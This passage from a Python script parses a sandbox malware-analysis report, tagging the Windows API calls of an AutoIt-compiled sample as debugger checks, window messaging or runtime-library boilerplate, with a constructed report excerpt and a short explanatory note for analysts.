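    args = [a.strip() for a in raw.split(",")] if raw is not None else []
    return ApiCall(m.group("name"), m.group("module"), args, m.group("ref"), m.group("caller"))


def parse_report(text: str) -> List[FunctionEntry]:
    """Split the report into one FunctionEntry per "APIs" block."""
    entries: List[FunctionEntry] = []
    current, section = None, None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            current = FunctionEntry()
            entries.append(current)
            section = "apis"
        elif s == "Strings":
            section = "strings"
        elif s == "Memory Dump Source":
            section = None
        elif current is not None and section == "apis":
            call = parse_api_line(s)
            if call:
                current.apis.append(call)
        elif current is not None and section == "strings" and s.startswith("•"):
            # "• <string>, xrefs: ADDR"; the string itself may contain commas
            current.strings.append(s.lstrip("•").strip().rsplit(", xrefs:", 1)[0])
    return entries


def decode_args(call: ApiCall) -> List[str]:
    return [ARG_DECODERS.get((call.name, i), {}).get(a, a) for i, a in enumerate(call.args)]


def classify(entry: FunctionEntry) -> set:
    tags = set()
    names = {c.name for c in entry.apis}
    direct = {c.name for c in entry.apis if c.caller is None}
    all_text = [a for c in entry.apis for a in c.args] + entry.strings
    if direct & {"IsDebuggerPresent", "OutputDebugStringW"}:
        tags.add("debugger-check")
    if names & {"SendMessageW", "PostMessageW"}:
        tags.add("window-messaging")
    if "FindWindowW" in direct and any("Shell_TrayWnd" in t for t in all_text):
        tags.add("taskbar-window")
    if any(r in t for r in RUNTIME_STRINGS for t in all_text):
        tags.add("runtime-boilerplate")  # library text: not evidence of sample intent
    return tags


def summarise(text: str) -> List[Dict[str, list]]:
    out = []
    for e in parse_report(text):
        direct = [f"{c.name}({', '.join(decode_args(c))})" for c in e.apis if c.caller is None]
        out.append({"direct_calls": direct, "tags": sorted(classify(e))})
    return out


# Constructed excerpt: the four function entries shown above, whitespace trimmed.
SAMPLE = """\
APIs
  • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
  • Part of subcall function 007AB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 007AB0E7
• SendMessageW.USER32(?,00000182,?,00000000), ref: 007A92D0
Strings
Memory Dump Source
APIs
• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 007A81CA
  • Part of subcall function 00773598: _doexit.LIBCMT ref: 007735A2
Strings
Memory Dump Source
APIs
  • Part of subcall function 0078B564: _memset.LIBCMT ref: 0078B571
  • Part of subcall function 00770B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0078B540,?,?,?,0075100A), ref: 00770B89
• IsDebuggerPresent.KERNEL32(?,?,?,0075100A), ref: 0078B544
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0075100A), ref: 0078B553
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0078B54E
Memory Dump Source
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007D5BF5
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 007D5C08
  • Part of subcall function 007B54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007B555E
Strings
Memory Dump Source
"""

if __name__ == "__main__":
    for i, row in enumerate(summarise(SAMPLE)):
        print(i, row["tags"], *row["direct_calls"], sep="\n    ")
```

Entries carrying only the runtime-boilerplate tag (the MessageBoxW and CAtlBaseModule functions) are the ones to skip when hunting for sample-authored anti-analysis logic; the Shell_TrayWnd / WM_COMMAND entry and the ListBox / ComboBox LB_DELETESTRING entry are AutoIt interpreter GUI plumbing as well, but the parser leaves them tagged only by behaviour because the page gives no string that ties them to a library.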